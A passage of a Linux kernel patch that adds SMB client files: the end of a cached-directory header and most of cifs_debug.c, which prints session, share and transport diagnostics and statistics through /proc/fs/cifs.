++				  * from a single context. Never dereferenced.
++				  */
++	struct mutex de_mutex;
++	int pos;		 /* Expected ctx->pos */
++	struct list_head entries;
++};
++
++struct cached_fid {
++	struct list_head entry;
++	struct cached_fids *cfids;
++	const char *path;
++	bool has_lease:1;
++	bool is_open:1;
++	bool on_list:1;
++	bool file_all_info_is_valid:1;
++	unsigned long time; /* jiffies of when lease was taken */
++	struct kref refcount;
++	struct cifs_fid fid;
++	spinlock_t fid_lock;
++	struct cifs_tcon *tcon;
++	struct dentry *dentry;
++	struct work_struct lease_break;
++	struct smb2_file_all_info file_all_info;
++	struct cached_dirents dirents;
++};
++
++#define MAX_CACHED_FIDS 16
++struct cached_fids {
++	/* Must be held when:
++	 * - accessing the cfids->entries list
++	 */
++	spinlock_t cfid_list_lock;
++	int num_entries;
++	struct list_head entries;
++};
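++
++/*
++ * Note: at most MAX_CACHED_FIDS (16) directories are cached per tcon;
++ * find_or_create_cached_dir() refuses to create new entries beyond that
++ * limit.
++ */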
++
++extern struct cached_fids *init_cached_dirs(void);
++extern void free_cached_dirs(struct cached_fids *cfids);
++extern int open_cached_dir(unsigned int xid, struct cifs_tcon *tcon,
++			   const char *path,
++			   struct cifs_sb_info *cifs_sb,
++			   bool lookup_only, struct cached_fid **cfid);
++extern int open_cached_dir_by_dentry(struct cifs_tcon *tcon,
++				     struct dentry *dentry,
++				     struct cached_fid **cfid);
++extern void close_cached_dir(struct cached_fid *cfid);
++extern void drop_cached_dir_by_name(const unsigned int xid,
++				    struct cifs_tcon *tcon,
++				    const char *name,
++				    struct cifs_sb_info *cifs_sb);
++extern void close_all_cached_dirs(struct cifs_sb_info *cifs_sb);
++extern void invalidate_all_cached_dirs(struct cifs_tcon *tcon);
++extern int cached_dir_lease_break(struct cifs_tcon *tcon, __u8 lease_key[16]);
++
++#endif			/* _CACHED_DIR_H */
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+new file mode 100644
+index 0000000000000..e41154ad96afc
+--- /dev/null
++++ b/fs/smb/client/cifs_debug.c
+@@ -0,0 +1,1067 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2000,2005
++ *
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ */
++#include <linux/fs.h>
++#include <linux/string.h>
++#include <linux/ctype.h>
++#include <linux/module.h>
++#include <linux/proc_fs.h>
++#include <linux/uaccess.h>
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifsfs.h"
++#include "fs_context.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#ifdef CONFIG_CIFS_SMB_DIRECT
++#include "smbdirect.h"
++#endif
++#include "cifs_swn.h"
++
++void
++cifs_dump_mem(char *label, void *data, int length)
++{
++	pr_debug("%s: dump of %d bytes of data at 0x%p\n", label, length, data);
++	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_OFFSET, 16, 4,
++		       data, length, true);
++}
++
++void cifs_dump_detail(void *buf, struct TCP_Server_Info *server)
++{
++#ifdef CONFIG_CIFS_DEBUG2
++	struct smb_hdr *smb = buf;
++
++	cifs_dbg(VFS, "Cmd: %d Err: 0x%x Flags: 0x%x Flgs2: 0x%x Mid: %d Pid: %d\n",
++		 smb->Command, smb->Status.CifsError,
++		 smb->Flags, smb->Flags2, smb->Mid, smb->Pid);
++	cifs_dbg(VFS, "smb buf %p len %u\n", smb,
++		 server->ops->calc_smb_size(smb));
++#endif /* CONFIG_CIFS_DEBUG2 */
++}
++
++void cifs_dump_mids(struct TCP_Server_Info *server)
++{
++#ifdef CONFIG_CIFS_DEBUG2
++	struct mid_q_entry *mid_entry;
++
++	if (server == NULL)
++		return;
++
++	cifs_dbg(VFS, "Dump pending requests:\n");
++	spin_lock(&server->mid_lock);
++	list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
++		cifs_dbg(VFS, "State: %d Cmd: %d Pid: %d Cbdata: %p Mid %llu\n",
++			 mid_entry->mid_state,
++			 le16_to_cpu(mid_entry->command),
++			 mid_entry->pid,
++			 mid_entry->callback_data,
++			 mid_entry->mid);
++#ifdef CONFIG_CIFS_STATS2
++		cifs_dbg(VFS, "IsLarge: %d buf: %p time rcv: %ld now: %ld\n",
++			 mid_entry->large_buf,
++			 mid_entry->resp_buf,
++			 mid_entry->when_received,
++			 jiffies);
++#endif /* STATS2 */
++		cifs_dbg(VFS, "IsMult: %d IsEnd: %d\n",
++			 mid_entry->multiRsp, mid_entry->multiEnd);
++		if (mid_entry->resp_buf) {
++			cifs_dump_detail(mid_entry->resp_buf, server);
++			cifs_dump_mem("existing buf: ",
++				mid_entry->resp_buf, 62);
++		}
++	}
++	spin_unlock(&server->mid_lock);
++#endif /* CONFIG_CIFS_DEBUG2 */
++}
++
++#ifdef CONFIG_PROC_FS
++static void cifs_debug_tcon(struct seq_file *m, struct cifs_tcon *tcon)
++{
++	__u32 dev_type = le32_to_cpu(tcon->fsDevInfo.DeviceType);
++
++	seq_printf(m, "%s Mounts: %d ", tcon->tree_name, tcon->tc_count);
++	if (tcon->nativeFileSystem)
++		seq_printf(m, "Type: %s ", tcon->nativeFileSystem);
++	seq_printf(m, "DevInfo: 0x%x Attributes: 0x%x\n\tPathComponentMax: %d Status: %d",
++		   le32_to_cpu(tcon->fsDevInfo.DeviceCharacteristics),
++		   le32_to_cpu(tcon->fsAttrInfo.Attributes),
++		   le32_to_cpu(tcon->fsAttrInfo.MaxPathNameComponentLength),
++		   tcon->status);
++	if (dev_type == FILE_DEVICE_DISK)
++		seq_puts(m, " type: DISK ");
++	else if (dev_type == FILE_DEVICE_CD_ROM)
++		seq_puts(m, " type: CDROM ");
++	else
++		seq_printf(m, " type: %d ", dev_type);
++
++	seq_printf(m, "Serial Number: 0x%x", tcon->vol_serial_number);
++
++	if ((tcon->seal) ||
++	    (tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
++	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
++		seq_printf(m, " Encrypted");
++	if (tcon->nocase)
++		seq_printf(m, " nocase");
++	if (tcon->unix_ext)
++		seq_printf(m, " POSIX Extensions");
++	if (tcon->ses->server->ops->dump_share_caps)
++		tcon->ses->server->ops->dump_share_caps(m, tcon);
++	if (tcon->use_witness)
++		seq_puts(m, " Witness");
++	if (tcon->broken_sparse_sup)
++		seq_puts(m, " nosparse");
++	if (tcon->need_reconnect)
++		seq_puts(m, "\tDISCONNECTED ");
++	seq_putc(m, '\n');
++}
++
++static void
++cifs_dump_channel(struct seq_file *m, int i, struct cifs_chan *chan)
++{
++	struct TCP_Server_Info *server = chan->server;
++
++	seq_printf(m, "\n\n\t\tChannel: %d ConnectionId: 0x%llx"
++		   "\n\t\tNumber of credits: %d Dialect 0x%x"
++		   "\n\t\tTCP status: %d Instance: %d"
++		   "\n\t\tLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d"
++		   "\n\t\tIn Send: %d In MaxReq Wait: %d",
++		   i+1, server->conn_id,
++		   server->credits,
++		   server->dialect,
++		   server->tcpStatus,
++		   server->reconnect_instance,
++		   server->srv_count,
++		   server->sec_mode,
++		   in_flight(server),
++		   atomic_read(&server->in_send),
++		   atomic_read(&server->num_waiters));
++}
++
++static void
++cifs_dump_iface(struct seq_file *m, struct cifs_server_iface *iface)
++{
++	struct sockaddr_in *ipv4 = (struct sockaddr_in *)&iface->sockaddr;
++	struct sockaddr_in6 *ipv6 = (struct sockaddr_in6 *)&iface->sockaddr;
++
++	seq_printf(m, "\tSpeed: %zu bps\n", iface->speed);
++	seq_puts(m, "\t\tCapabilities: ");
++	if (iface->rdma_capable)
++		seq_puts(m, "rdma ");
++	if (iface->rss_capable)
++		seq_puts(m, "rss ");
++	seq_putc(m, '\n');
++	if (iface->sockaddr.ss_family == AF_INET)
++		seq_printf(m, "\t\tIPv4: %pI4\n", &ipv4->sin_addr);
++	else if (iface->sockaddr.ss_family == AF_INET6)
++		seq_printf(m, "\t\tIPv6: %pI6\n", &ipv6->sin6_addr);
++	if (!iface->is_active)
++		seq_puts(m, "\t\t[for-cleanup]\n");
++}
++
++static int cifs_debug_files_proc_show(struct seq_file *m, void *v)
++{
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++
++	seq_puts(m, "# Version:1\n");
++	seq_puts(m, "# Format:\n");
++	seq_puts(m, "# <tree id> <ses id> <persistent fid> <flags> <count> <pid> <uid>");
++#ifdef CONFIG_CIFS_DEBUG2
++	seq_printf(m, " <filename> <mid>\n");
++#else
++	seq_printf(m, " <filename>\n");
++#endif /* CIFS_DEBUG2 */
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				spin_lock(&tcon->open_file_lock);
++				list_for_each_entry(cfile, &tcon->openFileList, tlist) {
++					seq_printf(m,
++						"0x%x 0x%llx 0x%llx 0x%x %d %d %d %pd",
++						tcon->tid,
++						ses->Suid,
++						cfile->fid.persistent_fid,
++						cfile->f_flags,
++						cfile->count,
++						cfile->pid,
++						from_kuid(&init_user_ns, cfile->uid),
++						cfile->dentry);
++#ifdef CONFIG_CIFS_DEBUG2
++					seq_printf(m, " %llu\n", cfile->fid.mid);
++#else
++					seq_printf(m, "\n");
++#endif /* CIFS_DEBUG2 */
++				}
++				spin_unlock(&tcon->open_file_lock);
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++	seq_putc(m, '\n');
++	return 0;
++}
++
++static int cifs_debug_data_proc_show(struct seq_file *m, void *v)
++{
++	struct mid_q_entry *mid_entry;
++	struct TCP_Server_Info *server;
++	struct TCP_Server_Info *chan_server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++	struct cifs_server_iface *iface;
++	int c, i, j;
++
++	seq_puts(m,
++		    "Display Internal CIFS Data Structures for Debugging\n"
++		    "---------------------------------------------------\n");
++	seq_printf(m, "CIFS Version %s\n", CIFS_VERSION);
++	seq_printf(m, "Features:");
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	seq_printf(m, " DFS");
++#endif
++#ifdef CONFIG_CIFS_FSCACHE
++	seq_printf(m, ",FSCACHE");
++#endif
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	seq_printf(m, ",SMB_DIRECT");
++#endif
++#ifdef CONFIG_CIFS_STATS2
++	seq_printf(m, ",STATS2");
++#else
++	seq_printf(m, ",STATS");
++#endif
++#ifdef CONFIG_CIFS_DEBUG2
++	seq_printf(m, ",DEBUG2");
++#elif defined(CONFIG_CIFS_DEBUG)
++	seq_printf(m, ",DEBUG");
++#endif
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	seq_printf(m, ",ALLOW_INSECURE_LEGACY");
++#endif
++#ifdef CONFIG_CIFS_POSIX
++	seq_printf(m, ",CIFS_POSIX");
++#endif
++#ifdef CONFIG_CIFS_UPCALL
++	seq_printf(m, ",UPCALL(SPNEGO)");
++#endif
++#ifdef CONFIG_CIFS_XATTR
++	seq_printf(m, ",XATTR");
++#endif
++	seq_printf(m, ",ACL");
++#ifdef CONFIG_CIFS_SWN_UPCALL
++	seq_puts(m, ",WITNESS");
++#endif
++	seq_putc(m, '\n');
++	seq_printf(m, "CIFSMaxBufSize: %d\n", CIFSMaxBufSize);
++	seq_printf(m, "Active VFS Requests: %d\n", GlobalTotalActiveXid);
++
++	seq_printf(m, "\nServers: ");
++
++	c = 0;
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		/* channel info will be printed as a part of sessions below */
++		if (CIFS_SERVER_IS_CHAN(server))
++			continue;
++
++		c++;
++		seq_printf(m, "\n%d) ConnectionId: 0x%llx ",
++			c, server->conn_id);
++
++		spin_lock(&server->srv_lock);
++		if (server->hostname)
++			seq_printf(m, "Hostname: %s ", server->hostname);
++		spin_unlock(&server->srv_lock);
++#ifdef CONFIG_CIFS_SMB_DIRECT
++		if (!server->rdma)
++			goto skip_rdma;
++
++		if (!server->smbd_conn) {
++			seq_printf(m, "\nSMBDirect transport not available");
++			goto skip_rdma;
++		}
++
++		seq_printf(m, "\nSMBDirect (in hex) protocol version: %x "
++			"transport status: %x",
++			server->smbd_conn->protocol,
++			server->smbd_conn->transport_status);
++		seq_printf(m, "\nConn receive_credit_max: %x "
++			"send_credit_target: %x max_send_size: %x",
++			server->smbd_conn->receive_credit_max,
++			server->smbd_conn->send_credit_target,
++			server->smbd_conn->max_send_size);
++		seq_printf(m, "\nConn max_fragmented_recv_size: %x "
++			"max_fragmented_send_size: %x max_receive_size:%x",
++			server->smbd_conn->max_fragmented_recv_size,
++			server->smbd_conn->max_fragmented_send_size,
++			server->smbd_conn->max_receive_size);
++		seq_printf(m, "\nConn keep_alive_interval: %x "
++			"max_readwrite_size: %x rdma_readwrite_threshold: %x",
++			server->smbd_conn->keep_alive_interval,
++			server->smbd_conn->max_readwrite_size,
++			server->smbd_conn->rdma_readwrite_threshold);
++		seq_printf(m, "\nDebug count_get_receive_buffer: %x "
++			"count_put_receive_buffer: %x count_send_empty: %x",
++			server->smbd_conn->count_get_receive_buffer,
++			server->smbd_conn->count_put_receive_buffer,
++			server->smbd_conn->count_send_empty);
++		seq_printf(m, "\nRead Queue count_reassembly_queue: %x "
++			"count_enqueue_reassembly_queue: %x "
++			"count_dequeue_reassembly_queue: %x "
++			"fragment_reassembly_remaining: %x "
++			"reassembly_data_length: %x "
++			"reassembly_queue_length: %x",
++			server->smbd_conn->count_reassembly_queue,
++			server->smbd_conn->count_enqueue_reassembly_queue,
++			server->smbd_conn->count_dequeue_reassembly_queue,
++			server->smbd_conn->fragment_reassembly_remaining,
++			server->smbd_conn->reassembly_data_length,
++			server->smbd_conn->reassembly_queue_length);
++		seq_printf(m, "\nCurrent Credits send_credits: %x "
++			"receive_credits: %x receive_credit_target: %x",
++			atomic_read(&server->smbd_conn->send_credits),
++			atomic_read(&server->smbd_conn->receive_credits),
++			server->smbd_conn->receive_credit_target);
++		seq_printf(m, "\nPending send_pending: %x ",
++			atomic_read(&server->smbd_conn->send_pending));
++		seq_printf(m, "\nReceive buffers count_receive_queue: %x "
++			"count_empty_packet_queue: %x",
++			server->smbd_conn->count_receive_queue,
++			server->smbd_conn->count_empty_packet_queue);
++		seq_printf(m, "\nMR responder_resources: %x "
++			"max_frmr_depth: %x mr_type: %x",
++			server->smbd_conn->responder_resources,
++			server->smbd_conn->max_frmr_depth,
++			server->smbd_conn->mr_type);
++		seq_printf(m, "\nMR mr_ready_count: %x mr_used_count: %x",
++			atomic_read(&server->smbd_conn->mr_ready_count),
++			atomic_read(&server->smbd_conn->mr_used_count));
++skip_rdma:
++#endif
++		seq_printf(m, "\nNumber of credits: %d Dialect 0x%x",
++			server->credits,  server->dialect);
++		if (server->compress_algorithm == SMB3_COMPRESS_LZNT1)
++			seq_printf(m, " COMPRESS_LZNT1");
++		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77)
++			seq_printf(m, " COMPRESS_LZ77");
++		else if (server->compress_algorithm == SMB3_COMPRESS_LZ77_HUFF)
++			seq_printf(m, " COMPRESS_LZ77_HUFF");
++		if (server->sign)
++			seq_printf(m, " signed");
++		if (server->posix_ext_supported)
++			seq_printf(m, " posix");
++		if (server->nosharesock)
++			seq_printf(m, " nosharesock");
++
++		if (server->rdma)
++			seq_printf(m, "\nRDMA ");
++		seq_printf(m, "\nTCP status: %d Instance: %d"
++				"\nLocal Users To Server: %d SecMode: 0x%x Req On Wire: %d",
++				server->tcpStatus,
++				server->reconnect_instance,
++				server->srv_count,
++				server->sec_mode, in_flight(server));
++
++		seq_printf(m, "\nIn Send: %d In MaxReq Wait: %d",
++				atomic_read(&server->in_send),
++				atomic_read(&server->num_waiters));
++
++		seq_printf(m, "\n\n\tSessions: ");
++		i = 0;
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			i++;
++			if ((ses->serverDomain == NULL) ||
++				(ses->serverOS == NULL) ||
++				(ses->serverNOS == NULL)) {
++				seq_printf(m, "\n\t%d) Address: %s Uses: %d Capability: 0x%x\tSession Status: %d ",
++					i, ses->ip_addr, ses->ses_count,
++					ses->capabilities, ses->ses_status);
++				if (ses->session_flags & SMB2_SESSION_FLAG_IS_GUEST)
++					seq_printf(m, "Guest ");
++				else if (ses->session_flags & SMB2_SESSION_FLAG_IS_NULL)
++					seq_printf(m, "Anonymous ");
++			} else {
++				seq_printf(m,
++				    "\n\t%d) Name: %s  Domain: %s Uses: %d OS: %s "
++				    "\n\tNOS: %s\tCapability: 0x%x"
++					"\n\tSMB session status: %d ",
++				i, ses->ip_addr, ses->serverDomain,
++				ses->ses_count, ses->serverOS, ses->serverNOS,
++				ses->capabilities, ses->ses_status);
++			}
++
++			seq_printf(m, "\n\tSecurity type: %s ",
++				get_security_type_str(server->ops->select_sectype(server, ses->sectype)));
++
++			/* dump session id helpful for use with network trace */
++			seq_printf(m, " SessionId: 0x%llx", ses->Suid);
++			if (ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA)
++				seq_puts(m, " encrypted");
++			if (ses->sign)
++				seq_puts(m, " signed");
++
++			seq_printf(m, "\n\tUser: %d Cred User: %d",
++				   from_kuid(&init_user_ns, ses->linux_uid),
++				   from_kuid(&init_user_ns, ses->cred_uid));
++
++			spin_lock(&ses->chan_lock);
++			if (CIFS_CHAN_NEEDS_RECONNECT(ses, 0))
++				seq_puts(m, "\tPrimary channel: DISCONNECTED ");
++			if (CIFS_CHAN_IN_RECONNECT(ses, 0))
++				seq_puts(m, "\t[RECONNECTING] ");
++
++			if (ses->chan_count > 1) {
++				seq_printf(m, "\n\n\tExtra Channels: %zu ",
++					   ses->chan_count-1);
++				for (j = 1; j < ses->chan_count; j++) {
++					cifs_dump_channel(m, j, &ses->chans[j]);
++					if (CIFS_CHAN_NEEDS_RECONNECT(ses, j))
++						seq_puts(m, "\tDISCONNECTED ");
++					if (CIFS_CHAN_IN_RECONNECT(ses, j))
++						seq_puts(m, "\t[RECONNECTING] ");
++				}
++			}
++			spin_unlock(&ses->chan_lock);
++
++			seq_puts(m, "\n\n\tShares: ");
++			j = 0;
++
++			seq_printf(m, "\n\t%d) IPC: ", j);
++			if (ses->tcon_ipc)
++				cifs_debug_tcon(m, ses->tcon_ipc);
++			else
++				seq_puts(m, "none\n");
++
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				++j;
++				seq_printf(m, "\n\t%d) ", j);
++				cifs_debug_tcon(m, tcon);
++			}
++
++			spin_lock(&ses->iface_lock);
++			if (ses->iface_count)
++				seq_printf(m, "\n\n\tServer interfaces: %zu",
++					   ses->iface_count);
++			j = 0;
++			list_for_each_entry(iface, &ses->iface_list,
++						 iface_head) {
++				seq_printf(m, "\n\t%d)", ++j);
++				cifs_dump_iface(m, iface);
++				if (is_ses_using_iface(ses, iface))
++					seq_puts(m, "\t\t[CONNECTED]\n");
++			}
++			spin_unlock(&ses->iface_lock);
++
++			seq_puts(m, "\n\n\tMIDs: ");
++			spin_lock(&ses->chan_lock);
++			for (j = 0; j < ses->chan_count; j++) {
++				chan_server = ses->chans[j].server;
++				if (!chan_server)
++					continue;
++
++				if (list_empty(&chan_server->pending_mid_q))
++					continue;
++
++				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
++					   chan_server->conn_id);
++				spin_lock(&chan_server->mid_lock);
++				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
++					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
++						   mid_entry->mid_state,
++						   le16_to_cpu(mid_entry->command),
++						   mid_entry->pid,
++						   mid_entry->callback_data,
++						   mid_entry->mid);
++				}
++				spin_unlock(&chan_server->mid_lock);
++			}
++			spin_unlock(&ses->chan_lock);
++			seq_puts(m, "\n--\n");
++		}
++		if (i == 0)
++			seq_printf(m, "\n\t\t[NONE]");
++	}
++	if (c == 0)
++		seq_printf(m, "\n\t[NONE]");
++
++	spin_unlock(&cifs_tcp_ses_lock);
++	seq_putc(m, '\n');
++	cifs_swn_dump(m);
++
++	/* BB add code to dump additional info such as TCP session info now */
++	return 0;
++}
++
++static ssize_t cifs_stats_proc_write(struct file *file,
++		const char __user *buffer, size_t count, loff_t *ppos)
++{
++	bool bv;
++	int rc;
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	rc = kstrtobool_from_user(buffer, count, &bv);
++	if (rc == 0) {
++#ifdef CONFIG_CIFS_STATS2
++		int i;
++
++		atomic_set(&total_buf_alloc_count, 0);
++		atomic_set(&total_small_buf_alloc_count, 0);
++#endif /* CONFIG_CIFS_STATS2 */
++		atomic_set(&tcpSesReconnectCount, 0);
++		atomic_set(&tconInfoReconnectCount, 0);
++
++		spin_lock(&GlobalMid_Lock);
++		GlobalMaxActiveXid = 0;
++		GlobalCurrentXid = 0;
++		spin_unlock(&GlobalMid_Lock);
++		spin_lock(&cifs_tcp_ses_lock);
++		list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++			server->max_in_flight = 0;
++#ifdef CONFIG_CIFS_STATS2
++			for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
++				atomic_set(&server->num_cmds[i], 0);
++				atomic_set(&server->smb2slowcmd[i], 0);
++				server->time_per_cmd[i] = 0;
++				server->slowest_cmd[i] = 0;
++				server->fastest_cmd[0] = 0;
++			}
++#endif /* CONFIG_CIFS_STATS2 */
++			list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++				list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++					atomic_set(&tcon->num_smbs_sent, 0);
++					spin_lock(&tcon->stat_lock);
++					tcon->bytes_read = 0;
++					tcon->bytes_written = 0;
++					spin_unlock(&tcon->stat_lock);
++					if (server->ops->clear_stats)
++						server->ops->clear_stats(tcon);
++				}
++			}
++		}
++		spin_unlock(&cifs_tcp_ses_lock);
++	} else {
++		return rc;
++	}
++
++	return count;
++}
++
++static int cifs_stats_proc_show(struct seq_file *m, void *v)
++{
++	int i;
++#ifdef CONFIG_CIFS_STATS2
++	int j;
++#endif /* STATS2 */
++	struct TCP_Server_Info *server;
++	struct cifs_ses *ses;
++	struct cifs_tcon *tcon;
++
++	seq_printf(m, "Resources in use\nCIFS Session: %d\n",
++			sesInfoAllocCount.counter);
++	seq_printf(m, "Share (unique mount targets): %d\n",
++			tconInfoAllocCount.counter);
++	seq_printf(m, "SMB Request/Response Buffer: %d Pool size: %d\n",
++			buf_alloc_count.counter,
++			cifs_min_rcv + tcpSesAllocCount.counter);
++	seq_printf(m, "SMB Small Req/Resp Buffer: %d Pool size: %d\n",
++			small_buf_alloc_count.counter, cifs_min_small);
++#ifdef CONFIG_CIFS_STATS2
++	seq_printf(m, "Total Large %d Small %d Allocations\n",
++				atomic_read(&total_buf_alloc_count),
++				atomic_read(&total_small_buf_alloc_count));
++#endif /* CONFIG_CIFS_STATS2 */
++
++	seq_printf(m, "Operations (MIDs): %d\n", atomic_read(&mid_count));
++	seq_printf(m,
++		"\n%d session %d share reconnects\n",
++		tcpSesReconnectCount.counter, tconInfoReconnectCount.counter);
++
++	seq_printf(m,
++		"Total vfs operations: %d maximum at one time: %d\n",
++		GlobalCurrentXid, GlobalMaxActiveXid);
++
++	i = 0;
++	spin_lock(&cifs_tcp_ses_lock);
++	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
++		seq_printf(m, "\nMax requests in flight: %d", server->max_in_flight);
++#ifdef CONFIG_CIFS_STATS2
++		seq_puts(m, "\nTotal time spent processing by command. Time ");
++		seq_printf(m, "units are jiffies (%d per second)\n", HZ);
++		seq_puts(m, "  SMB3 CMD\tNumber\tTotal Time\tFastest\tSlowest\n");
++		seq_puts(m, "  --------\t------\t----------\t-------\t-------\n");
++		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
++			seq_printf(m, "  %d\t\t%d\t%llu\t\t%u\t%u\n", j,
++				atomic_read(&server->num_cmds[j]),
++				server->time_per_cmd[j],
++				server->fastest_cmd[j],
++				server->slowest_cmd[j]);
++		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
++			if (atomic_read(&server->smb2slowcmd[j])) {
++				spin_lock(&server->srv_lock);
++				seq_printf(m, "  %d slow responses from %s for command %d\n",
++					atomic_read(&server->smb2slowcmd[j]),
++					server->hostname, j);
++				spin_unlock(&server->srv_lock);
++			}
++#endif /* STATS2 */
++		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
++			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
++				i++;
++				seq_printf(m, "\n%d) %s", i, tcon->tree_name);
++				if (tcon->need_reconnect)
++					seq_puts(m, "\tDISCONNECTED ");
++				seq_printf(m, "\nSMBs: %d",
++					   atomic_read(&tcon->num_smbs_sent));
++				if (server->ops->print_stats)
++					server->ops->print_stats(m, tcon);
++			}
++		}
++	}
++	spin_unlock(&cifs_tcp_ses_lock);
++
++	seq_putc(m, '\n');
++	return 0;
++}
++
++static int cifs_stats_proc_open(struct inode *inode, struct file *file)
++{
++	return single_open(file, cifs_stats_proc_show, NULL);
++}
++
++static const struct proc_ops cifs_stats_proc_ops = {
++	.proc_open	= cifs_stats_proc_open,
++	.proc_read	= seq_read,
++	.proc_lseek	= seq_lseek,
++	.proc_release	= single_release,
++	.proc_write	= cifs_stats_proc_write,
++};
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++#define PROC_FILE_DEFINE(name) \
++static ssize_t name##_write(struct file *file, const char __user *buffer, \
++	size_t count, loff_t *ppos) \
++{ \
++	int rc; \
++	rc = kstrtoint_from_user(buffer, count, 10, & name); \
++	if (rc) \
++		return rc; \
++	return count; \
++} \
++static int name##_proc_show(struct seq_file *m, void *v) \
++{ \
++	seq_printf(m, "%d\n", name ); \
++	return 0; \
++} \
++static int name##_open(struct inode *inode, struct file *file) \
++{ \
++	return single_open(file, name##_proc_show, NULL); \
++} \
++\
++static const struct proc_ops cifs_##name##_proc_fops = { \
++	.proc_open	= name##_open, \
++	.proc_read	= seq_read, \
++	.proc_lseek	= seq_lseek, \
++	.proc_release	= single_release, \
++	.proc_write	= name##_write, \
++}
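++
++/*
++ * Each invocation below generates a read/write proc handler pair and a
++ * cifs_<name>_proc_fops table for an integer tunable; e.g.
++ * PROC_FILE_DEFINE(rdma_readwrite_threshold) backs the
++ * "rdma_readwrite_threshold" entry created in cifs_proc_init().
++ */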
++
++PROC_FILE_DEFINE(rdma_readwrite_threshold);
++PROC_FILE_DEFINE(smbd_max_frmr_depth);
++PROC_FILE_DEFINE(smbd_keep_alive_interval);
++PROC_FILE_DEFINE(smbd_max_receive_size);
++PROC_FILE_DEFINE(smbd_max_fragmented_recv_size);
++PROC_FILE_DEFINE(smbd_max_send_size);
++PROC_FILE_DEFINE(smbd_send_credit_target);
++PROC_FILE_DEFINE(smbd_receive_credit_max);
++#endif
++
++static struct proc_dir_entry *proc_fs_cifs;
++static const struct proc_ops cifsFYI_proc_ops;
++static const struct proc_ops cifs_lookup_cache_proc_ops;
++static const struct proc_ops traceSMB_proc_ops;
++static const struct proc_ops cifs_security_flags_proc_ops;
++static const struct proc_ops cifs_linux_ext_proc_ops;
++static const struct proc_ops cifs_mount_params_proc_ops;
++
++void
++cifs_proc_init(void)
++{
++	proc_fs_cifs = proc_mkdir("fs/cifs", NULL);
++	if (proc_fs_cifs == NULL)
++		return;
++
++	proc_create_single("DebugData", 0, proc_fs_cifs,
++			cifs_debug_data_proc_show);
++
++	proc_create_single("open_files", 0400, proc_fs_cifs,
++			cifs_debug_files_proc_show);
++
++	proc_create("Stats", 0644, proc_fs_cifs, &cifs_stats_proc_ops);
++	proc_create("cifsFYI", 0644, proc_fs_cifs, &cifsFYI_proc_ops);
++	proc_create("traceSMB", 0644, proc_fs_cifs, &traceSMB_proc_ops);
++	proc_create("LinuxExtensionsEnabled", 0644, proc_fs_cifs,
++		    &cifs_linux_ext_proc_ops);
++	proc_create("SecurityFlags", 0644, proc_fs_cifs,
++		    &cifs_security_flags_proc_ops);
++	proc_create("LookupCacheEnabled", 0644, proc_fs_cifs,
++		    &cifs_lookup_cache_proc_ops);
++
++	proc_create("mount_params", 0444, proc_fs_cifs, &cifs_mount_params_proc_ops);
++
++#ifdef CONFIG_CIFS_DFS_UPCALL
++	proc_create("dfscache", 0644, proc_fs_cifs, &dfscache_proc_ops);
++#endif
++
++#ifdef CONFIG_CIFS_SMB_DIRECT
++	proc_create("rdma_readwrite_threshold", 0644, proc_fs_cifs,
++		&cifs_rdma_readwrite_threshold_proc_fops);
++	proc_create("smbd_max_frmr_depth", 0644, proc_fs_cifs,
++		&cifs_smbd_max_frmr_depth_proc_fops);
++	proc_create("smbd_keep_alive_interval", 0644, proc_fs_cifs,
++		&cifs_smbd_keep_alive_interval_proc_fops);
++	proc_create("smbd_max_receive_size", 0644, proc_fs_cifs,
++		&cifs_smbd_max_receive_size_proc_fops);
++	proc_create("smbd_max_fragmented_recv_size", 0644, proc_fs_cifs,
++		&cifs_smbd_max_fragmented_recv_size_proc_fops);
++	proc_create("smbd_max_send_size", 0644, proc_fs_cifs,
++		&cifs_smbd_max_send_size_proc_fops);
++	proc_create("smbd_send_credit_target", 0644, proc_fs_cifs,
++		&cifs_smbd_send_credit_target_proc_fops);
